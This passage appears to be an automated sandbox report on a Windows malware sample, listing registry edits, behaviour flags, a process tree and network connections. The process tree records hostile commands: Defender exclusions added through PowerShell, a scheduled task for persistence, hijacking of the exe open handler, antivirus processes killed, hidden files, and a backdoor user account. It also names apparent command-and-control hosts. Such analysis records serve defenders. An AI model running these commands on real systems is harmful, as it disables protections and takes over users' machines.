| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-384068567-2943195810-3631207890-1000\{0BD19191-5D7F-4C59-BCEB-85BBF7CF1334} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\uzdixv.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file3.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CurrentVersion | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CurrentVersion\Explorern | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CurrentVersion\Explorern\NoControlPanel = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explîrer | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explîrer\StartmenuLogoff = "1" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Test.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\vydcyu.exe
"C:\Users\Admin\AppData\Local\Temp\vydcyu.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\file2.exe"
C:\Users\Admin\AppData\Local\Temp\file2.exe
C:\Users\Admin\AppData\Local\Temp\file2.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\file3.exe"
C:\Users\Admin\AppData\Local\Temp\file3.exe
C:\Users\Admin\AppData\Local\Temp\file3.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp\file2.exe" +s +h
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /k attrib C:\Users\Admin\AppData\Local\Temp\file2.exe +s +h
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp" +s +h
C:\Windows\SysWOW64\notepad.exe
notepad
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /k attrib C:\Users\Admin\AppData\Local\Temp +s +h
C:\Windows\SysWOW64\attrib.exe
attrib C:\Users\Admin\AppData\Local\Temp\file2.exe +s +h
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\attrib.exe
attrib C:\Users\Admin\AppData\Local\Temp +s +h
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE"
C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE
C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE
C:\Windows\SysWOW64\notepad.exe
notepad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://prison-fakes.ru/s/3.php?t=
C:\Windows\SysWOW64\rundll32.exe
rundll32 user32, SwapMouseButton
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument http://prison-fakes.ru/s/3.php?t=
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument http://prison-fakes.ru/s/3.php?t=
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x418
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Name.vbs"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spidernt.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im avz.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im drweb32w.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im filemon.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regmon.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im avp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im avp32.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im bidef.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im frv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ndd32.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im minilog.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im zonealarm.exe
C:\Windows\SysWOW64\net.exe
net user Áåçîïàñíàÿ çîíà 1234 /add
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe" >> NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe >> NUL
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Áåçîïàñíàÿ çîíà 1234 /add
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\uzdixv.exe"
C:\Users\Admin\AppData\Local\Temp\uzdixv.exe
C:\Users\Admin\AppData\Local\Temp\uzdixv.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Service.exe"
C:\Users\Admin\AppData\Local\Temp\Service.exe
C:\Users\Admin\AppData\Local\Temp\Service.exe
C:\Windows\SysWOW64\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\xyz.vbs"
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\OST-Silent-Hill-Zvuk-sireny(muzofon.com).mp3"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\zxeafc.EXE"
C:\Users\Admin\AppData\Local\Temp\zxeafc.EXE
C:\Users\Admin\AppData\Local\Temp\zxeafc.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\usrpyw.EXE"
C:\Users\Admin\AppData\Local\Temp\usrpyw.EXE
C:\Users\Admin\AppData\Local\Temp\usrpyw.EXE
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe"
C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe
C:\Users\Admin\AppData\Local\Temp\fzvbsa.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ahevhj.exe"
C:\Users\Admin\AppData\Local\Temp\ahevhj.exe
C:\Users\Admin\AppData\Local\Temp\ahevhj.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ugbxwz.EXE"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\SYSTEM32\CMD.EXE
"CMD.EXE"
C:\Windows\system32\msg.exe
msg
C:\Windows\system32\msg.exe
msg * hacked
C:\Windows\system32\msg.exe
msg * ?? ?????
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qp1s5xt5\qp1s5xt5.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES891E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc927B9FEB7DC54E5FBC8440C18A1DCD7.TMP"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\explorer.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\svchost.exe
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\05b1294391bb46059d72d21b3f3b4045 /t 4988 /p 2116
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\dca72dcaecf0483e91257b99088add55 /t 2112 /p 2252
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edition-ages.gl.at.ply.gg | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 21.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
| US | 8.8.8.8:53 | dn-master.ddns.net | udp |
